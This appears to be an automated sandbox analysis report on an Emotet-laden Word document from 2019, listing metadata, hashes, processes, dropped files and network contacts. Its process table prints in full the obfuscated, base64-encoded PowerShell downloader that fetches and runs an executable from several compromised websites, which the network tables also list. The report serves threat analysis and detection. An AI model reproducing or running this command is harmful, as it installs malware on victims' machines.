File name: | 9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1 |
Full analysis: | https://app.any.run/tasks/56df1396-00c5-4a93-be81-55b7d775f2d8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:21:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Virginia, Subject: Trafficway, Author: Virgil Weissnat, Keywords: compressing, Comments: Agent, Template: Normal.dotm, Last Saved By: Shemar Abbott, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:46:00 2019, Last Saved Time/Date: Fri Oct 11 13:46:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0 |
MD5: | 8284E996AEA8E5075256C03A93EAA6DF |
SHA1: | 296A881BDDE6650D439F607293DA8C63C1AD43E0 |
SHA256: | 9E1D7CD63B0EDCB4B3C4B1C86ECF477245BA82B4291BF26484FE2DD6CD9D12A1 |
SSDEEP: | 6144:qOlRhyHkMKUzSdnLx3wD6RjKBiXCoCD2O/PRi:qOlRhyHk1UGdt3EqCi |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Heidenreich |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 203 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Macejkovic - Treutel |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 174 |
Words: | 30 |
Pages: | 1 |
ModifyDate: | 2019:10:11 12:46:00 |
CreateDate: | 2019:10:11 12:46:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Shemar Abbott |
Template: | Normal.dotm |
Comments: | Agent |
Keywords: | compressing |
Author: | Virgil Weissnat |
Subject: | Trafficway |
Title: | Virginia |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1516 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3932 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA4D6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RWNJC2UOOBPA9I4F9493.temp | — | |
MD5:— | SHA256:— | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:232C95F063EB4B4E96674E371F41D5EE | SHA256:D69FBD77D194718F34082C2306AE0C1F665EDA316C00F60D65080D96367E6BF3 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\266E8366.wmf | wmf | |
MD5:E7352603A8133672D2040C2CB941309D | SHA256:79FD74EC0B4754D832BBA89D4B9F7CFF2CB43CD705E754FE64E6F43F8D1AF0B6 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4FA4412.wmf | wmf | |
MD5:6D29753A945A3630809F8CCF84EAD963 | SHA256:C836D2354E1BD1BDF4692102BC8C9EB73591E114DD4FD7ADD74F71E5CB30D9D1 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE96CC64.wmf | wmf | |
MD5:D80CD6BF1857923CEB75FBD80FDA8608 | SHA256:EE6441D5FC0BDE7A2E2D1C656D5646337B021C3D3F15F392BDA3D6760C7BD0E8 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:674E699E357ECBC4E3BD6468C164D68E | SHA256:1857F8723EBCDBE439CC3EAF02BC0450A831B4B5165EBA754DE3C42FC64781D1 | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A49997E.wmf | wmf | |
MD5:5C75BAC4670CF539507C916F1CB2E5E8 | SHA256:895518E13FCC0B517A9EB90A80E81F1E34C701A1252AB28C80EDE9C4C249DE84 | |||
3932 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1516 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE95D4B9.wmf | wmf | |
MD5:862AF9676C5222FAD75140D3F139D3A4 | SHA256:CA9A0B8F8D8DC8D4169B108076C8E62CFE7173AF6257E8C5E930505CE5F9A234 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3932 | powershell.exe | GET | 404 | 110.10.129.117:80 | http://firstmnd.com/wp/wp-content/3k960/ | KR | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 51.91.176.30:80 | http://fattoriaiponti.com/wp-admin/o1wiEqPfN/ | GB | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 162.144.93.20:80 | http://deredia.com/cgi-bin/cbas/ | US | xml | 345 b | suspicious |
3932 | powershell.exe | GET | 404 | 112.213.89.96:80 | http://citylandgovap.net/8dqs5fv/6J/ | VN | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3932 | powershell.exe | 110.10.129.117:80 | firstmnd.com | SK Broadband Co Ltd | KR | suspicious |
3932 | powershell.exe | 198.71.59.14:443 | thesilverant.com | 1&1 Internet SE | US | unknown |
3932 | powershell.exe | 162.144.93.20:80 | deredia.com | Unified Layer | US | suspicious |
3932 | powershell.exe | 112.213.89.96:80 | citylandgovap.net | SUPERDATA | VN | suspicious |
3932 | powershell.exe | 51.91.176.30:80 | fattoriaiponti.com | — | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
thesilverant.com |
| unknown |
firstmnd.com |
| suspicious |
citylandgovap.net |
| suspicious |
deredia.com |
| suspicious |
fattoriaiponti.com |
| suspicious |